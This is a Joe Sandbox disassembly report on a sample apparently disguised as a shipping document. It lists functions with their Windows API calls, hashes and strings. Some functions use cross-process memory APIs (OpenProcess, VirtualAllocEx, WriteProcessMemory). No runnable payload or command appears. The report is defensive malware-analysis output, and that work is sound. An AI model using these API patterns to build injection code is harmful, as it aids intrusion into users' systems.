HeapAlloc.KERNEL32(00000000,?,006BA69F,?,?,?), ref: 006BABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 006BAC0E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 7601ef5b261dba58a4f46661548c90c41fad049cfab10bf8f37af9c6ad33642e
Instruction ID: 96960d08b00a3a9cd8d57018681376998909e276faceb54bd8d8aff108392b79
Opcode Fuzzy Hash: 7601ef5b261dba58a4f46661548c90c41fad049cfab10bf8f37af9c6ad33642e
Instruction Fuzzy Hash: 7901F6B1200214BFDB204FE9DC48DAB7EAEEF8A7957104569F945C2260DB759C80CB65

Function 006C7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 006C7A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006C7A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006C7A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006C7A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 006C7AD0

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 83e30d4a38e499ae87ae1369a11e6402390cb063d7ddfb1332c6659a2f5fbf63
Instruction ID: 4eb18380e99a4f2c4252145af9c3c25c820f91fa5814959ed706c9f884412b50
Opcode Fuzzy Hash: 83e30d4a38e499ae87ae1369a11e6402390cb063d7ddfb1332c6659a2f5fbf63
Instruction Fuzzy Hash: DB015731C0461DEBCF10AFE5DC48AEDBB79FB08301F014189E902B2250DF349A508BA9

Function 006B9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 006B9ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 006B9AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 006B9B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 006B9B15
CLSIDFromString.OLE32(?,?), ref: 006B9B21

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 3523c0678ee9906228a5b78e8f8b97a85c09fcd222df79d7406463f15853b108
Instruction ID: 99702bab7941e63429b27131a20090ae5cf4a63476e668d333e809e03cf5a1d6
Opcode Fuzzy Hash: 3523c0678ee9906228a5b78e8f8b97a85c09fcd222df79d7406463f15853b108
Instruction Fuzzy Hash: 4C012CBA610219EBDB214F94ED44AEABAAEEB45751F148024FA05D2250DB74DD809BB0

Function 006BAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006BAA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006BAA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006BAA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006BAA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006BAAAF

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: fc2fb6843f9d6b64f06d628ee67957f77ec810294b02e809b51c6241a2b5bc82
Instruction ID: 4479178cad168b244024e2bc651cf54e6cf73f335b092461037d2afb5992d6a9
Opcode Fuzzy Hash: fc2fb6843f9d6b64f06d628ee67957f77ec810294b02e809b51c6241a2b5bc82
Instruction Fuzzy Hash: D4F03C75200308AFEB215FE4AC89EAB3BADFB49754B404619F945C6290DA649C81CB71

Function 006BAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006BAADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006BAAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006BAAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006BAAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006BAB10

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: bd60cd4fc6a0123307b3e3bce4e7000cca4fa79e532dd17e1b73020860dbe8cc
Instruction ID: 9ba6510bc2f7ad432185c0183b0fc65b3e4e20bfb6fd6826034cfafadbbddc0b
Opcode Fuzzy Hash: bd60cd4fc6a0123307b3e3bce4e7000cca4fa79e532dd17e1b73020860dbe8cc
Instruction Fuzzy Hash: FBF03C75210318AFEB214FE4EC88EB73B6EFF45754F004129F955C7290CA649C418B61

Function 006BEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 006BEC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 006BECAB
MessageBeep.USER32(00000000), ref: 006BECC3
KillTimer.USER32(?,0000040A), ref: 006BECDF
EndDialog.USER32(?,00000001), ref: 006BECF9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 7637645653825ec41a7b4af6fe4f4ca5a9e9d285224f086afc6a8331a706540f
Instruction ID: 1c6c0f066d9c58706e642c5fc74d3eb6f0a8896ea85bcbe02969fed67a3d0b9d
Opcode Fuzzy Hash: 7637645653825ec41a7b4af6fe4f4ca5a9e9d285224f086afc6a8331a706540f
Instruction Fuzzy Hash: 3D018170500704EBEB345B50DE4EBD67BB9FB00705F004659B692A15E0DFF9AE98CB84

Function 0069B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0069B0BA
StrokeAndFillPath.GDI32(?,?,006FE680,00000000,?,?,?), ref: 0069B0D6
SelectObject.GDI32(?,00000000), ref: 0069B0E9
DeleteObject.GDI32 ref: 0069B0FC
StrokePath.GDI32(?), ref: 0069B117

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 65bfbeaa568fd9c85d908ae5279cfb9626891af0f4614836dfd34911a6928406
Instruction ID: 837c091471c8b2e92f20d013ffb347e4517fecf814afe29f6a68ec5cf51f8a96
Opcode Fuzzy Hash: 65bfbeaa568fd9c85d908ae5279cfb9626891af0f4614836dfd34911a6928406
Instruction Fuzzy Hash: 00F0F638000308EFCB21AFA5FD0C7943B69A712362F49C316E429845F0CB3989A6CF59

Function 006CF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006CF2DA
CoCreateInstance.OLE32(0070DA7C,00000000,00000001,0070D8EC,?), ref: 006CF2F2
CoUninitialize.OLE32 ref: 006CF555

Strings

.lnk, xrefs: 006CF28B, 006CF290, 006CF29E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: da62c8c28ee3df2725af9e4aabe731fa08f185d94d138a3e0835717c649defe6
Instruction ID: 9d07b0253387e65f81c59966f6e4d35454dd28b37a325d600974a9ac7a9d2419
Opcode Fuzzy Hash: da62c8c28ee3df2725af9e4aabe731fa08f185d94d138a3e0835717c649defe6
Instruction Fuzzy Hash: 09A13BB1104201AFD740EFA4C891EABB7EDEF98714F004A1DF55597192EB70EA09CB66

Function 006CE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0068660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006853B1,?,?,006861FF,?,00000000,00000001,00000000), ref: 0068662F

CoInitialize.OLE32(00000000), ref: 006CE85D
CoCreateInstance.OLE32(0070DA7C,00000000,00000001,0070D8EC,?), ref: 006CE876
CoUninitialize.OLE32 ref: 006CE893

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

Strings

.lnk, xrefs: 006CE83B, 006CE84D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: d2b45e0208c175101742e43ac19ccb832e2c5f2ba7c332dbe66463d095015409
Instruction ID: b0f8a51b81c4556630f8e76fca9d82b1a149ea13e91f3b067422f0ecdcd7a592
Opcode Fuzzy Hash: d2b45e0208c175101742e43ac19ccb832e2c5f2ba7c332dbe66463d095015409
Instruction Fuzzy Hash: 59A111756042019FCB50EF14C884E6ABBE6FF89710F148A5CF9969B3A1CB32ED45CB91

Function 006A325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006A32ED

Part of subcall function 006AE0D0: __87except.LIBCMT ref: 006AE10B

Strings

pow, xrefs: 006A32C5, 006A32E2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: dfc189906cbd40c36bc31f94ea144cc13990e881da755d0285995502f76ad7d6
Instruction ID: 55f85bea57b90714cf8b3e6a5e54432103d0cbdb86037f76d3fa13e281cb23fa
Opcode Fuzzy Hash: dfc189906cbd40c36bc31f94ea144cc13990e881da755d0285995502f76ad7d6
Instruction Fuzzy Hash: BA515731A0C25196CB157718C9413FA7BD6DB43710F20CD68F4C5823E9EF3A8E959E4A

Function 006C4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0071DC50,?,0000000F,0000000C,00000016,0071DC50,?), ref: 006C4645

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 006C46C5

Strings

THIS, xrefs: 006C4703
REMOVE, xrefs: 006C4676

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 413273f277fc9b5688981bcd5da2d2c33c571a8e8b73e22b9cf2cbc76cf83fca
Instruction ID: 777091d0cee666f7fef87aaed3c94427558bd1c8d5cb23b025ef2888a445ba3e
Opcode Fuzzy Hash: 413273f277fc9b5688981bcd5da2d2c33c571a8e8b73e22b9cf2cbc76cf83fca
Instruction Fuzzy Hash: 8F413734A002099FCF41EFA4C895ABDB7B6FF49314F14806DE916AB392DB349946CB64

Function 006BC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006BBC08,?,?,00000034,00000800,?,00000034), ref: 006C4335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006BC1D3

Part of subcall function 006C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 006C4300

Part of subcall function 006C422F: GetWindowThreadProcessId.USER32(?,?), ref: 006C425A
Part of subcall function 006C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 006C426A
Part of subcall function 006C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 006C4280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006BC240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006BC28D

Strings

@, xrefs: 006BC2A5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 3d8e9aeb7345ad4e407cc6c13829da7cb6065d29b27d966a0ce76a38b05f8607
Instruction ID: 5fa4b704435d1033f82e7293f5d63681fb0eace314b5c1eff61919119fb280bd
Opcode Fuzzy Hash: 3d8e9aeb7345ad4e407cc6c13829da7cb6065d29b27d966a0ce76a38b05f8607
Instruction Fuzzy Hash: E9412A72900218AFDB10DBA4C892FEEB7B9EF09710F004199FA45B7181DA75AF85CB65

Function 006EA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0071DC00,00000000,?,?,?,?), ref: 006EA6D8
GetWindowLongW.USER32 ref: 006EA6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 006EA705

Strings

SysTreeView32, xrefs: 006EA6AA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 13a0fed51491d78810c7488db71a901a1eeb8e2d85f1adf7832d61035c75b500
Instruction ID: 207ba7f3041a6e74bb91a9a40185aebfdbb2d2ac01177a925f22361b802174c9
Opcode Fuzzy Hash: 13a0fed51491d78810c7488db71a901a1eeb8e2d85f1adf7832d61035c75b500
Instruction Fuzzy Hash: 9331CE35101345AFDF219FB9CC41BEA77AAEB49324F244729F875922E0CB74AC509B94

Function 006D5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006D5190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006D51C6

Strings

Dm, xrefs: 006D522E
|, xrefs: 006D51B5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$Dm
API String ID: 1413715105-2946291300
Opcode ID: 9677e0077abed3c0e3b8d7d0fade12fa54436e076bc3c8ae04c2bae91eb9a35f
Instruction ID: dca2884c54cd0b59b9e2f764e7a54386876d5b8bae445aac8a86ab0ab7d899e7
Opcode Fuzzy Hash: 9677e0077abed3c0e3b8d7d0fade12fa54436e076bc3c8ae04c2bae91eb9a35f
Instruction Fuzzy Hash: 49311C71C00119ABCF51EFE4CC85AEE7FBAFF14750F10011AF815A6266DB31AA46DBA4

Function 006EA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006EA15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006EA172
SendMessageW.USER32(?,00001002,00000000,?), ref: 006EA196

Strings

SysMonthCal32, xrefs: 006EA129

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 3cfb54a8942dfdd8c1dd48a4e6f9e21a7e3a868907ab2463e01d0a0d1e128b52
Instruction ID: c6fbde7742657f67a5349a1e5fe5d435719c7d81744865afc5ac421e5f7664aa
Opcode Fuzzy Hash: 3cfb54a8942dfdd8c1dd48a4e6f9e21a7e3a868907ab2463e01d0a0d1e128b52
Instruction Fuzzy Hash: DE219F32510218ABEF158FA4CC82FEA3B7AEF48754F110214FA556B1D0D6B5BC55CB94

Function 006EA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 006EA941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 006EA94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 006EA956

Strings

msctls_updown32, xrefs: 006EA8BB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 29e286904f33facd17e146c437d309121f6582ab875fd92f6fd8b938be439c69
Instruction ID: e9cea6576ecff7202effedcd1c04cb6dc971dc5a38fe31fa934f304b461db093
Opcode Fuzzy Hash: 29e286904f33facd17e146c437d309121f6582ab875fd92f6fd8b938be439c69
Instruction Fuzzy Hash: 3721B2B5210209AFDB10DF69CC81DB737AEEB4A394B050159FA049B362CB31FC118B75

Function 006E99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006E9A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006E9A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006E9A65

Strings

Listbox, xrefs: 006E99FD

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
